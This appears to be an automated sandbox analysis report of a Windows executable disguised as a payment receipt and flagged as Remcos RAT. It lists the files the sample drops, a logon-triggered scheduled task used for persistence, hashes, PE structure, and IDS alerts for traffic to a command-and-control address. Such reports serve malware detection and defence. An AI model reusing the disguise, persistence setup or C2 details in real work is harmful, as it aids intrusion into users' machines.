                                                  SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eaJOpx.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1415
                                                  Entropy (8bit):5.352427679901606
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                  MD5:97AD91F1C1F572C945DA12233082171D
                                                  SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                  SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                  SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):963
                                                  Entropy (8bit):5.0171130712019085
                                                  Encrypted:false
                                                  SSDEEP:12:tkluWJmnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkD:qlupdbauKyGX85jvXhNlT3/7CcVKWro
                                                  MD5:0A55905951B6633AC409C89A600E5B38
                                                  SHA1:A8D63D48564E1A2F3C222B98C163E9B541042DA2
                                                  SHA-256:1E06332C729A91A1DBE6ABE75457CA239DAB2B3EC27E3AAC6BD57D357EF35FEC
                                                  SHA-512:99BE9B0C66C0C52F9F96B764146382DF6A93CF4EC053219903C2B7316136DDAA7E4510EBB5D4BADE50685C6A77F52FD81F594A22D7BF147576F464C3FAABD486
                                                  Malicious:false
                                                  Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2232
                                                  Entropy (8bit):5.380805901110357
                                                  Encrypted:false
                                                  SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:lGLHyIFKL3IZ2KRH9OugYs
                                                  MD5:A9155A6B0927A3C0F28D51A6B7113A96
                                                  SHA1:02E3CEAD53BE46D65C1BED154A51707D856DFEA2
                                                  SHA-256:168BD0354D375B14667BB2E7BD23754D06F31D46707329A334FAB6394BCF74BD
                                                  SHA-512:AA1D2C2D7825C02187712FB2AA6F0408E88D8A5F3C95ED1406BFCED825CFA965D53531893E7E655A04A058877A779A35AD6F73FB0A9A40A105B950083330D80E
                                                  Malicious:false
                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5kazxclq.gbr.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vhcvold.ncd.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhkepvxk.xjh.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xiuktixp.lqd.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\bhvB35D.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                  Category:dropped
                                                  Size (bytes):15728640
                                                  Entropy (8bit):0.10106922760070924
                                                  Encrypted:false
                                                  SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                  MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                  SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                  SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                  SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                  Malicious:false
                                                  Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:Qn:Qn
                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                  Malicious:false
                                                  Preview:..

                                                  C:\Users\user\AppData\Local\Temp\tmpD79C.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  File Type:XML 1.0 document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):1579
                                                  Entropy (8bit):5.098206194352828
                                                  Encrypted:false
                                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtg+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTgyv
                                                  MD5:68E55A87975C676F40922F833B99541C
                                                  SHA1:9156F94EBB60D490C4C2FEDA24AAA78AF08C10B0
                                                  SHA-256:B8A7A164FF14157BE8B1B2D352950341A6C743F5619E5CF2FED66E31C4A741B8
                                                  SHA-512:8801D3D91F010B6E13FE11993F2CDBF92427738F9E1F7B4169DBCE8E9976996B58833CFEC0A7C7DC4CF3DA00FEEF938C1DB7E760B650CF651BBCF9EF6C5906E3
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                  C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:XML 1.0 document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):1579
                                                  Entropy (8bit):5.098206194352828
                                                  Encrypted:false
                                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtg+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTgyv
                                                  MD5:68E55A87975C676F40922F833B99541C
                                                  SHA1:9156F94EBB60D490C4C2FEDA24AAA78AF08C10B0
                                                  SHA-256:B8A7A164FF14157BE8B1B2D352950341A6C743F5619E5CF2FED66E31C4A741B8
                                                  SHA-512:8801D3D91F010B6E13FE11993F2CDBF92427738F9E1F7B4169DBCE8E9976996B58833CFEC0A7C7DC4CF3DA00FEEF938C1DB7E760B650CF651BBCF9EF6C5906E3
                                                  Malicious:true
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                  C:\Users\user\AppData\Roaming\eaJOpx.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1193984
                                                  Entropy (8bit):7.633790432294662
                                                  Encrypted:false
                                                  SSDEEP:24576:CHoI9FW8oqKqzDHgz2XmSkZVgZ9g/oPd+p:CHL0q/D22kZVa9gAPsp
                                                  MD5:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  SHA1:E3D9F0DE991F7B91C04449A0A12CB398DF6CBD21
                                                  SHA-256:695E10634E8981A0D110A120BADE28B66B58C6400879B37257894D219C55048D
                                                  SHA-512:C300B4A521E90FBB4FDDCE0E11113230AFC9C383BE47E7E0A1FC13AA3178703FBF0CA37A6633FDE98A681BFBB7A4F1603F851ED6750E315B1CDAD1706631285F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 34%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag..............0..$...........B... ...`....@.. ....................................@.................................bB..O....`..................................T............................................ ............... ..H............text...."... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............6..............@..B.................B......H.......T...PN..............0..............................................}.....r...ps....}......}.....(.......(.....*..0..5..........}.....{....o.....sE.....o......(......{....o.....*....0..5..........}.....{....o.....s?.....o......(......{....o.....*...{....o.....(......{....o.....*...0............{.........,..(......*..*...0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....s....}.....s....}.....( .....{....r...p"..\A...s!...o".

                                                  C:\Users\user\AppData\Roaming\eaJOpx.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.633790432294662
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:SwiftCopy_PaymtRecpt121228.exe
                                                  File size:1'193'984 bytes
                                                  MD5:1f0ae2753f131f73c2fe881c1c8e7c8f
                                                  SHA1:e3d9f0de991f7b91c04449a0a12cb398df6cbd21
                                                  SHA256:695e10634e8981a0d110a120bade28b66b58c6400879b37257894d219c55048d
                                                  SHA512:c300b4a521e90fbb4fddce0e11113230afc9c383be47e7e0a1fc13aa3178703fbf0ca37a6633fde98a681bfbb7a4f1603f851ed6750e315b1cdad1706631285f
                                                  SSDEEP:24576:CHoI9FW8oqKqzDHgz2XmSkZVgZ9g/oPd+p:CHL0q/D22kZVa9gAPsp
                                                  TLSH:8D45D0C03736B301DD68A6708825EDB813692E746050F5EABDEE37CB75B9B116E08F46
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag..............0..$...........B... ...`....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:7d5876664a9b81e1

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x5142b6
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x67611DD1 [Tue Dec 17 06:44:33 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1142620x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1160000x10ed0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1280000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x111fd40x54.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x1122bc0x112400456f903993cf6102d856ea1ae892cc76False0.8407900452939836OpenPGP Secret Key7.753706861790718IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x1160000x10ed00x110007de2abb54880b034029676a732e35bb7False0.13677619485294118data4.16670306109466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x1280000xc0x200ec187c555b3a1ee6a6d27dea393d2880False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x1161300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.1281349816633148
                                                  RT_GROUP_ICON0x1269580x14data1.0
                                                  RT_VERSION0x12696c0x378data0.43243243243243246
                                                  RT_MANIFEST0x126ce40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-17T16:37:04.673904+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549706192.210.150.1756887TCP
                                                  2024-12-17T16:37:07.330710+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549708178.237.33.5080TCP
                                                  2024-12-17T16:39:56.158723+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549983192.210.150.1756887TCP
                                                  2024-12-17T16:39:56.361838+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549984192.210.150.1756887TCP
                                                  2024-12-17T16:40:02.502445+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549985192.210.150.1756887TCP
                                                  2024-12-17T16:40:11.721264+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549986192.210.150.1756887TCP
                                                  2024-12-17T16:40:11.940037+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549987192.210.150.1756887TCP
                                                  2024-12-17T16:40:18.830725+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549988192.210.150.1756887TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 17, 2024 16:37:03.347707033 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:03.467653990 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:03.467791080 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:03.474006891 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:03.594063997 CET5688749706192.210.150.17192.168.2.5
